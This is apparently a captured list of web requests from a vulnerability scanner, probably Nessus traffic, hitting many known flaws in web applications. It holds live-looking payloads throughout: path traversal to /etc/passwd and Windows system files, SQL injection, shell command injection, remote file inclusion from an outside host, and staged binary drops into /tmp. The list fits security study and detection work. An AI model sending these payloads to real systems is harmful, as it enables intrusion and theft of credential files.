/javascript/license.exe
/zln2hm2z.kspx?
/main.php?logout="rm q68212743 #
/help.php?q='\x0duname >q49373567 #
/main.php?stuff="uname >q55141299 #
/scripts/fxm.exe
/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,1607725405,0,0,0,0,0--
/examples/jsp/colors/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00
/gepi/gestion/savebackup.php?filename=http://192.168.202.118:8080/2aibfaczmac8?&cmd=cat/etc/passwd
/help.php?q=ping;-w;7000;-n;1;4.3.2.1&rem;
/phpmyadmin/index.php?search=&function=search
/help.php?q=\x0duname >q13423853 #
/cacti/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold
/script/tick/test.php?path_to_code=http://192.168.202.118:8080/ghl9il?
/passwdpk/
/um7xpn15.aspx?
/en-us/account/rss.php?blogid=1&profile=../../config/config.properties.php\x00
/javascript/p2p.exe
/help.php?q="ping,-w,11000,-n,1,1.2.3.4&rem,
/o6ebbirj.jspa?
/recordings/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login
/tukodz3j.pl?
/main.inc.php?pathtoscript=http://192.168.202.118:8080/tzhfyzkbomspvm?
/mpcgi/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go
/nyvbv05h.cfm?
/5qnlm5z2.nsf?
/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1075239311,2,231042861,4,5,6,7,8,9,0,1,2,3 --
/cgi/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
/if69ddo1.idc?
/gy23xnjq.exe?
/h5i6crm3.cfm?
/examples/jsp/checkbox/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00
/iajtej82.exe?
/fc9t54l7.dll?
/javascript/document.zip
/javascript/codes.exe
/7u1pb2xi.cfm?
/examples/jsp/checkbox/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00
/forum1_professionnel.asp?n=1771&nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&page=1
/javascript/family.exe
/main.php?stuff="|ping\x09-w\x097000\x09-n\x091\x091.2.3.4|rem\x09
/javascript/next.exe
/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/yzicxmyifv0;echo|awstats291064.txt
/pxagj7n7.fts?
/7o5qp766.cgi?
/main.php?logout="&ping\x0c-w\x0c11000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/o35zot2r.cgi?
/6n7aacgg.fts?
/ddoworrl.mscgi?
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/iljyfcptvy0+>+/dev/null+&'); function v
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php&frm_user=&scr_height=&scr_width=q51964837
/b5xdqgz2.do?
/main.php?logout="del\xa0q32937989&rem\xa0
/examples/jsp/colors/tinybrowser/upload.php?badfiles=1>
/examples/jsp/jsp2/el/htmlscript?../../../../../../../../../etc/passwd
/uvazfs7p.php3?
/javascript/portals.exe
/bzuf9ozq.idc?
/examples/jsp/cal/cart32.exe
/javascript/cfdocs.exe
/6dlc2zm9.cfc?
/x7pclv4s.jspa?
/subscription_accounts/
/starnet/addons/slideshow_full.php?album_name='2073512306
/webscripter_professional/
/examples/jsp/checkbox/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&"
/esmozg5d.nsf?
/scripts/wa?debug-show-version
/cgi.cgi/fileseek.cgi?foot=&head=;cat /etc/passwd|
/a0imiuf1.do?
/en-us/fo564rei.cfc?
/ybz5rz7a.cfm?
/xlj7h65o.htm?
/ydexw8by.idc?
/examples/jsp/cal/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
/hipkz026.jsp?
/main.php?stuff="&ping;-w;8000;-n;1;1.2.3.4&rem;
/scriptingnews2/
/gy23xnjq.asp?
/en-us/33y9gcqq.php?
/main.php?logout=";uname\x09>q86216423\x09#
/javascript/rtf.exe
/modules.php?op=modload&name=wiki&file=index&pagename=
/javascript/hits.exe
/javascript/packaged.exe
/6wb70v0b.fts?
/javascript/key.exe
/manager/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd
/eei78ore.nsf?
/82q7ywa8.pl?
/0z575z74.asp?
/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/llumt7msyau5y??&cmd=ls
/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331908740,1,705379658--
/javascript/downloader.exe
/hrttz9fj.php?
/cgi-home/fileseek2.cgi?foot=;cat /etc/passwd&head=
/d5a5renl.exe?
/examples/jsp/colors/backend/classes.php?include_path=../lib/jinzora.js\x00
/6n7aacgg.php?
/javascript/callin.exe
/examples/jsp/num/config.php?path[docroot]=/etc/passwd\x00
/scripts/lrn28issfuqi.pl
/a0imiuf1.nsf?
/help.php?q=uname\x09>q28292329\x09#
/examples/jsp/num/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd
/scripts/index.php?edit=nonexistant1039175028
/scripts/mail.php?id='/**/union/**/select/**/1,2,1332010406,4--&blog=1
/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/tzhfyzkbomspvm?
/h5sc3gxy.aspx?
/examples/jsp/jsp2/el/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00
/examples/jsp/colors/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org
/ovcgi/ovwebhelp.exe
/se_tester'schoicelogo/
/de3v2dd9.nsf?
/examples/jsp/sessions/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00
/examples/jsp/cal/save.php?file_save=/etc/passwd
/javascript/webalizer.exe
http://pjizgstmsezmytmzdudhgoanlryrqyevgutukoucyyhzubhijuwpcnmzcpqkvacnxssovdbegscoacprvpzshmnxaoc.com
/wa.exe?debug-show-version
/examples/jsp/num/activatemember?activatecode=&member=">
/javascript/1999.exe
/9ko6m4c8.htm?
/en-us/s7qus4g3.php?
/cacti/index.php?cat_select=
/5o9zq43e.mscgi?
/javascript/htpasswd.tmp
/www/delivery/ac.php?bannerid=-1332010390+or+1=1+--+';passthru(base64_decode($_server[http_nessus_crnvjntc]));die;/*
/en-us/n9xlumt5.mscgi?
/o1zj4u9v.mscgi?
/vmi8bb12.html?
/xlj7h65o.idc?
/examples/jsp/jsp2/jspx/include/theme.inc.php?fullpath=/etc/passwd\x00
/examples/jsp/jsp2/jspx/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd
/cacti/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331905213,113095511 --
/javascript/file.exe
/news.php?scriptpath=http://192.168.202.118:8080/zz5thkvtmlgl??
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../vtigerservice.php\x00
/phpmyadmin/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print "content-type: text/plain\x0d\x0a\x0d\x0a";system(id)&action=logout
/scripts/event_view.php?eid=34 union select 1183395596
/6wb70v0b.x?
/protection.php?action=logout&siteurl=../../../../../../../../../../etc/passwd\x00
/en-us/w4996nr0.nsf?
/main.php?logout=ping;-w;9000;-n;1;1.2.3.4|rem;
/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\x00
/en-us/account/index.php?cat='
/javascript/document.png
/sdk/../../../../../../etc/vmware/hostd/vminventory.xml
/index.php?categories=1&cat=xx' union/**/ select '1','412675581480','2','comments' /*
/phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs"=sleep(4)="
/examples/jsp/checkbox/search/show.pl?url=file:/etc/passwd
/recordings/index.php?id='union/**/select/**/0,0,1161314398,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/jw64yq8u.nsf?
/examples/servlets/servlet/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/
/ygkjkngd.php3?
/main.php?stuff=";uname\x09>q19299327\x09#
/help.php?q=ver\xa0>q27113942&rem\xa0
/article.php?sid=\">
document.cookie="testmybc=2088;"
/cgi-bin/index.php?id=h6xj4vcok1'
/1qwv2p5p.htm?
/javascript/gateway.exe
/inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/moclyxlwqyfjnp?
/examples/jsp/jsp2/el/forum_2.php?msg=10&return=
/nyvbv05h.aspx?
/javascript/pop.exe
/examples/jsp/sessions/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd
/help.php?q='\x0asleep\x099\x09#
/top.php?stuff="&ping -w 7000 -n 1 4.3.2.1&rem
/a0imiuf1.cgi?
/fnwhrxyd.x?
/examples/jsp/jsp2/jspx/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\x00
/examples/jsp/cal/lang/lang.php?lang_path=/etc/passwd\x00
/javascript/events.exe
/main.php?logout=rm;q78779487&rem;
//
/rbec2ohx.fts?
/examples/servlets/servlet/top.php?header=../../../../../../../../etc/passwd
/main.php?logout="|ping,-w,11000,-n,1,1.2.3.4|rem,
/nsn/..\util/md.bas
/t3af3tdz.fts?
/t3af3tdz.aspx?
/en-us/odzk29aa.kspx?
/cgi-exe/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go
/en-us/jnv890lt.fts?
/scripts/guestbook.php
/advancedbashscriptingguide/
/examples/jsp/cal/js/scripts.php?load=/etc/passwd\x00
/main.php?stuff="|ping -w 11000 -n 1 1.2.3.4|rem
/phpmyadmin/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl
/en-us/esmozg5d.dll?
/examples/jsp/checkbox/source?v=../../../../../../../../../../etc/passwd\x00
/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null --
/nsn/..\util/dir.bas
/templates/prescription/
/ht8pn8uq.x?
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008322&lang_crm=../../vtigerservice.php\x00
/javascript/crack.exe
/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1332010406,4--&blog=1
/don't panic/
/n9xlumt5.php3?
/examples/jsp/colors/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\x00
/d7ktpmcq.html?
/recordings/a1disp3.cgi?/../../../../../../etc/passwd
/javascript/chris.exe
/examples/jsp/sessions/texis.exe/?-dump
/3m5knyc4.jspa?
/tukodz3j.cgi?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+1a+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00++>>esbq
/gepi/gestion/savebackup.php?filename=http://192.168.202.96:8080/txenjrxf3?&cmd=cat/etc/passwd
/help.php?q=ver\x09>q23929766&rem\x09
/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\x00
/javascript/mailman.exe
/phpmyadmin/search.cgi?..\..\..\..\..\..\winnt\win.ini
/cgi-bin/fileseek2.cgi?head=&foot=;cat /etc/passwd
/cgi-bin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/examples/jsp/sessions/store.cgi?startid=../../../../../../../../../etc/passwd\x00.html
/a0imiuf1.pl?
/if69ddo1.exe?
/index.php?news7["functions"]=http://192.168.202.118:8080/ghl9il?
/phpmyadmin/ion-p.exe?page=c:\\winnt\\win.ini
/en-us/dda2qr7j.php?
/manager/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00
/themes/simple/user_style.php?user_colors[bg_color]="
/destiny's-child/
/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=";echo ''; echo `id `;die();echo"
/scripting_faq/
/606wkcop.do?
/top.php?stuff="&del\x09q42671474&rem\x09
/viagra_prescription/
/examples/jsp/jsp2/el/cart32.exe
/main.php?frm_daynight=q28628781&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php&frm_user=&scr_height=&scr_width=
/javascript/contract.exe
/main.php?stuff='\x0ddel\x09q12818567\x09#
/main.php?stuff="&ver&rem\x0c
/scripts/addentry.php
/admin/index.php/">
/help.php?q=;sleep 11 #
/cgi_bin/listrec.pl?app=qmh-news&template=;ls /etc|
/en-us/
/job_description/
/javascript/fetch.exe
/scgi-bin/windmail.exe
/scripts/home/search.asp?nchannel='1
/mv8wxfy9.exe?
/examples/jsp/jsp2/el/main.php?g2_itemid=../../../../../license\x00
/submitscript/
/1r8cfrlf.cfc?
/examples/jsp/jsp2/el/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00|
/jw64yq8u.jspa?
/examples/jsp/jsp2/jspx/search.cgi?..\..\..\..\..\..\windows\win.ini
/error/\..\..\..\..\winnt\win.ini
/top.php?stuff=";sleep 10 #
/../.sln
/scripts-util/
/help.php?q='\x0adel q22265597 #
/scripts/rpc.php?cmd=display_get_requesters&id=1
/o6ebbirj.jsp?
/en-us/account/index.php?template=../../../loudblog/custom/config.php\x00
/fcgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00
/scripts/gw5/gwweb.exe?help=bad-request
/javascript/maven.exe
/main.php?stuff=rm;q53449996&rem;
/carisoprodol-script/
/viewpage.php?file=/etc/passwd
/o6ebbirj.exe?
/examples/jsp/sessions/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00
/scripts/admin.pl?path=bin/mozilla&action=list_users
/i686v90l.aspx?
/phpmyadmin/forum_2.php?msg=10&return=
/help.php?q="|ping\x0c-w\x0c9000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c
/scripts/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../etc/passwd
/../.sql
/ghswfouu.html?
/scripts/cleartrust/ct_logon.asp?ctloginerrormsg=
/manager/viewpage.php?file=/etc/passwd
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+61+c3+60+52+53+33+c0+e8+0a+00+00+00+5b+5a+03+d8+2b+d0+75+ef+61+c3++>>esbq
/main.php?stuff="|ping\x0c-w\x0c8000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c
/javascript/shadow.exe
/examples/jsp/cal/remindpasswd
/technology-description/
/index.php?op=default&date=200607' union select 1,898491611,1,1,1,1,1,1,1,1--&blogid=1
/recordings/resetpw.php?email=../../../../../../../../../../../../etc/passwd
/gvx7m5ti.mscgi?
/ju0u7kfo.mscgi?
/examples/jsp/cal/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 --
/examples/servlets/servlet/texis.exe/?-dump
/examples/servlets/servlet/index.php?_language=../../../../../../../../../../etc/passwd\x00
/top.php?stuff=ver >q22882938&rem
/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.118:8080/2aibfaczmac8?\x00
/ewc3rz1l.mscgi?
/tuwjta1w.php3?
/en-us/account/file.php?path=/etc/passwd\x00
/examples/jsp/jsp2/el/search/show.pl?url=file:/etc/passwd
/help.php?q="del,q74835818&rem,
/javascript/modify.exe
/hrttz9fj.nsf?
/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332008329',null,null,null,null --
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/xvvpghsokp0+>+/dev/null+&')."]=1
/top.php?stuff="\x0asleep 11 #
/cacti/admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus
/h5sc3gxy.cgi?
/o35zot2r.x?
/include/scripts/send_email_cache.php?dir=http://192.168.202.118:8080/ghl9il?
/help.php?q=;rm q31144684 #
/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332010400','5'--
/examples/jsp/num/phptonuke.php?filnavn=/etc/passwd
/top.php?stuff="&ver&rem\x0c
/d44uk9h2.x?
/admin-serv/tasks/configuration/viewlog?file=passwd&num=5000&str=&directories=admin-serv/logs/../../../../../../etc&id=admin-serv
/cacti/listrec.pl?app=qmh-news&template=;ls /etc|
/
/j4oqyvga.mscgi?
/examples/jsp/colors/calendar_admin.pl?config=|cat /etc/passwd|
/8x6w469u.pl?
/help.php?q='\x0ddel q49373567 #
/cgi-bin/gw5/gwweb.exe?htmlver=aaa&get-context
/u8yiqilu.jsp?
/javascript/computer.exe
/help.php?q="|ping,-w,9000,-n,1,4.3.2.1|rem,
/index.php?dir=
/top.php?stuff=';uname\x09#
/help.php?q='\x0ddel\x09q63353886\x09#
/d5a5renl.aspx?
/ju0u7kfo.cfm?
/kb.php?category_id=xxl>
/help.php?q="ping\xa0-w\xa011000\xa0-n\xa01\xa01.2.3.4|rem\xa0
/main.php?stuff="uname\x09>q91227717\x09#
/examples/jsp/sessions/download.php?language=/etc/passwd\x00
/confirmunsubscription.php?output=http://192.168.202.118:8080/ghl9il?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+6f+61+64+4c+69+62+72+61+72+79+41+00+00+00+00+47+65+74+50+72+6f+63+41+64+64++>>esbq
/ao22ww7y.cfc?
/index.php?in=song&term=&action=search&start=0
/top.php?stuff="\x0auname #
/jackrabbit/search.jsp?q=%"
/index.php?id='union/**/select/**/0,0,2115200900,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/ows-bin/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf
/cgi-sys/r.cgi?file=../../../../../../../../../../etc/passwd
/0rufe52p.jsp?
/scripts/starnet/addons/slideshow_full.php?album_name='648730541
/cgi-914/.passwd
/cgi-local/fileseek.cgi?foot=&head=;cat /etc/passwd|
/main.php?stuff="ping\xa0-w\xa010000\xa0-n\xa01\xa04.3.2.1|rem\xa0
/scripts/news.scr.php?globals[pth][classes]=@rfiurl?globals[pth][classes]=@rfiurl?
/scripts/b0j2ijssh6cu.cfm
/servlet/msgpage?action=test&msg=
/bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/javascript/htpasswd.cfg
/examples/jsp/num/search/results.stm?indexname=>">&style=fancy&spage=60&query=folder name
/top.php?stuff=';rm\x09q97745414\x09#
/examples/jsp/checkbox/install.php?newlang=../../cpg_error.log\x00
/help.php?q="del q26428197&rem
/6wb70v0b.aspx?
/top.php?stuff="del\x09q67284925&rem\x09
/edittag/edittag.cgi?file=/../../../../../etc/passwd
/examples/jsp/jsp2/el/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/phpmyadmin/store.cgi?startid=../../../../../../../../../etc/passwd\x00.html
/scripts/t769qwej0llr.pl
/scripts/nx/common/cds/menu.inc.php?c_path=http://xxxxxxxx/
/promo-transcript7/
/javascript/removals.exe
/mpcgi/fileseek.cgi?foot=&head=;cat /etc/passwd|
/quagynka.aspx?
/main.php?logout="ping;-w;7000;-n;1;1.2.3.4|rem;
/examples/jsp/cal/cgiwrap/cgiwrap_error_page_handling_xss.nasl
/javascript/.passwd.class
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/frznctvhi0i5??
/jdx255ea.nsf?
/?
/help.php?q="\x0ddel\x09q76412123\x09#
/examples/servlets/servlet/help/index.php?help_file=../../../../../../../../../../../etc/passwd
/o35zot2r.fts?
/sysuser/docmgr/htaccess.stm?path=
/cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\x00
/n9xlumt5.htm?
/help.php?q="ping,-w,11000,-n,1,4.3.2.1&rem,
/metranscript/
/fa8p8lr8.nsf?
/examples/servlets/servlet/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00
/examples/jsp/cal/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini
/?
/hosting-scripts/
/jackin' pop/
/ygkjkngd.cfm?
/main.php?stuff="&uname >q23549573 #
/cgis/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|'
/_vti_bin/_vti_adm/admin.exe
/javascript/htpasswd.rb
/main.php?logout=';rm q59144751 #
/en-us/account/lib/dbman_filter.inc.php?lib_path=/etc/passwd\x00
/byrg33fw.aspx?
/javascript/.passwd.sh
/l13b77e5.pl?
/d44uk9h2.aspx?
/scripts/session/login.php
/top.php?stuff='\x0drm\x09q15742122\x09#
/help.php?q="ver,>q69289112&rem,
/javascript/close.exe
/
/dailies biblical scripture v1/
/viagra-prescriptions/
/y8pmygrp.jspa?
/vmi8bb12.cfc?
/h21y8w52.htm?
/news/include/createdb.php?langfile;=http://cirt.net/rfiinc.txt??
/javascript/.passwd.key
/archive.php?scriptpath=http://192.168.202.96:8080/swgnhpydbq0t??
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/606wkcop.htm?
/mv8wxfy9.idc?
/cacti/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00
/manager/print.php?what=article&id='
/cgi-exe/gw5/gwweb.exe?htmlver=aaa&get-context
/examples/jsp/jsp2/jspx/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00
/cgi-bin/index.php?id=kis0atfdu6'
/scripts/test-cgi?/*
/quagynka.htm?
/javascript/fabric.exe
/help.php?q="ping\x09-w\x099000\x09-n\x091\x094.3.2.1&rem\x09
/scripts/k0pxpjgnimox.html
/top.php?stuff="\x0duname\x09>q41641295\x09#
/eg2u8pbv.mscgi?
/6wb70v0b.idc?
/scripts/yfmo7jpwvpv1.php3
/169okeyj.asp?
/javascript/.htaccess.sfish/'`uname`'
/scheme-description/
/scripts/eezuu7xc7ge3.cgi
/6wb70v0b.dll?
/examples/servlets/servlet/bb_func_txt.php?pathtofiles=/etc/passwd\x00
/scripts/texis.exe/junk
/fc9t54l7.idc?
/main.php?logout='\x0dsleep\x099\x09#
/forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../../../../../../../../../../../boot.ini
/t3af3tdz.html?
/m2fpztty.aspx?
/top.php?stuff='uname #
/scripts/wd7crx47eaml.sh
/examples/jsp/colors/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
/javascript/document.cpp
/scripts/vzdybnanqpc3.pl
/examples/jsp/jsp2/jspx/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
/bxnyrhmh.cgi?
/code/inc_header.php?gtopnombre=">
/vmi8bb12.fts?
/examples/jsp/checkbox/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00
/eg2u8pbv.html?
/en-us/ddoworrl.htm?
/zuihld5m.mscgi?
/l13b77e5.mscgi?
/javascript/iisadmin.exe
/cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
/htbin/r.cgi?file=../../../../../../../../../../etc/passwd
/examples/jsp/colors/javascript.php?abs_path=/etc/passwd\x00
/subscriptions.log
/recordings/index.php?search=
/cgi-exe/a1disp3.cgi?../../../../../../../../../../etc/passwd
/main.php?logout=ping;-w;11000;-n;1;1.2.3.4&rem;
/
/miz4r5hz.cfc?
/examples/jsp/jsp2/el/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/news/include/createdb.php?langfile;=http://192.168.202.118:8080/ghl9il??
/1qwv2p5p.asp?
/phpmyadmin/documentation.html?phpmyadmin=1'
/examples/jsp/colors/welcome.php?custom_welcome_page=/etc/passwd\x00
/en-us/dda2qr7j.html?
/examples/jsp/sessions/add_url.htm?node=
/domainfiles/*//../../../../../../../../../../etc/passwd
/bl8sefdm.jsp?
/j2kdmfw4.nsf?
/include/scripts/export_batch.inc.php?dir=http://192.168.202.118:8080/tzhfyzkbomspvm?
/phpmyadmin/documentation.html?phpmyadmin=/\../\../\../\../\../\../\../etc/passwd
/javascript/ini.exe
/examples/jsp/num/index.php?show=../../../../../../../../../../../etc/passwd\x00
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "\0174\0044\0000\0377\0347" >> /tmp/vsnlklmgzu0;echo|awstats235001.txt
/scripts/1331909165-ror_session_fixation.nasl
/help.php?q="\x0adel q73214822 #
/javascript/document.inc
/cgi-bin/20review.asp?productcode='
/b4vng02k.jsp?
/examples/jsp/sessions/index.php?sensor_program=
/gy23xnjq.x?
/en-us/esmozg5d.mscgi?
/phpmyadmin/documentation.html?phpmyadmin=">'>'"
/"consumer+information"/
/nsn/..\util/dsbrowse.bas
/top.php?stuff='&uname >q61677415 #
/eg2u8pbv.do?
/a0imiuf1.jspa?
/cgi-bin/base_local_rules.php?dir=
/manager/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\x00
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/bin/echo+-en+"\0174\0044\0000\0377\0347"+>>+/tmp/hlgncmwqwx0;')."]=1
/eei78ore.mscgi?
/cgi-bin/index.php?mod_id=2&kb_ask=
/javascript/queue.exe
/s7qus4g3.asp?
/main.php?stuff=del;q53449996&rem;
/ewc3rz1l.cgi?
/bn857frh.asp?
/zqqemp6j.cfm?
/cgi-sys/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|'
/naviconapplescript20050412/
/en-us/account/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/
/examples/jsp/error/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini
/t578vqea.fts?
/scripts/sawmillcl.exe?ho+{complete_version}
/cgi-bin/index.php?search=&function=search
/javascript/affiliates.exe
/ydexw8by.x?
/examples/jsp/num/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wpypq2jh]));die;/*
/script/ident/ident.inc.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?
/if69ddo1.fts?
/javascript/audio.exe
/scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.118:8080/moclyxlwqyfjnp??
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+28+30+00+00+00+00++>>esbq
/admin.php?"><"
/main.php?stuff='rm q94914736 #
/examples/servlets/servlet/login.php?course=">
/puttputtzoo.exe/
/examples/jsp/jsp2/el/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1
/news.php?scriptpath=@rfiurl?scriptpath=@rfiurl?
/5o9zq43e.jspa?
/qczkquis.mscgi?
/en-us/7o5qp766.mscgi?
/cgi-bin/pfdispaly.cgi?../../../../../../etc/passwd
/h5sc3gxy.x?
/xanax-description/
/hipkz026.fts?
/scriptomania_v2/
/scripts/nsiislog.dll
/javascript/25.exe
/en-us/33y9gcqq.jspa?
/more.php?id=1'
/t7tm4m0b.cfc?
/search-results.dot?search_query=
/help.php?q="del\x09q46669995\x09#
/scripts/shop.plx/page=nessus1521425795
/en-us/account/phptonuke.php?filnavn=/etc/passwd
/javascript/player.exe
/d765w06j.x?
/jdx255ea.pl?
/lostpasswd/
/javascript/sox.exe
/examples/jsp/sessions/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\x00
/fc9t54l7.aspx?
/scripts/t769qwej0llr.cfm
/javascript/cgi.exe
/index.php?id=yfbenmzg_m'
/javascript/papers.exe
/scripts/index.php?option=frontpage&itemid=2|system(id)|1331909360
/https-admserv/bin/index?/
/javascript/1001.exe
/main.php?logout='
/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919216,539900350 --
/en-us/account/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd
/scripts/xuicksry9grj.sh
/edzaia0i.do?
/examples/jsp/jsp2/jspx/popup.php?include_path=/etc/passwd\x00
/ast_description/
/9kr0ih0v.kspx?
/login.php/login.php?lang=../../../../../ubbc.js\x00
/javascript/x.exe
/scripts/index.php?option=frontpage&itemid=2|system(id)|1331904229
/lsoix5h3.pl?
/a0imiuf1.htm?
/en-us/n9xlumt5.pl?
/en-us/account/popup.php?include_path=/etc/passwd\x00
/j734qobz.fts?
/mpcgi/powerup/r.cgi?file=../../../../../../../../../../etc/passwd
/papert's_principle/
/javascript/active.exe
/qhvu0pdg.pl?
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/tzhfyzkbomspvm??
/cgi-914/ion-p.exe?page=c:\winnt\repair\sam
/xfkun1ku.kspx?
/scripts/setup.php
/ht8pn8uq.pl?
/weq93ppb.jspa?
/script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.96:8080/4dckqcc0acprbz?
/recordings/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00
/7dbjwpw6.cfm?
/examples/jsp/jsp2/el/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00
/javascript/signin.exe
/esmozg5d.fts?
/scripts/www/delivery/ac.php?bannerid=-290+or+1=1
/ddoworrl.cfm?
/main.php?logout="ping\x0c-w\x0c10000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/hwxugbkmva"
/examples/jsp/jsp2/el/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00
/manager/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/examples/jsp/jsp2/el/search.pl?form=../../../../../../etc/passwd\x00
/top.php?stuff="&uname >q38114689 #
/examples/jsp/colors/index.php?entry='
/0rufe52p.php?
/scripts/gbadmin.cgi?action=change_adminpass
ftp://192.168.27.102/*
/vac1l5vm.do?
/jdx255ea.jsp?
/include/scripts/send_email_cache.php?dir=http://192.168.202.118:8080/moclyxlwqyfjnp?
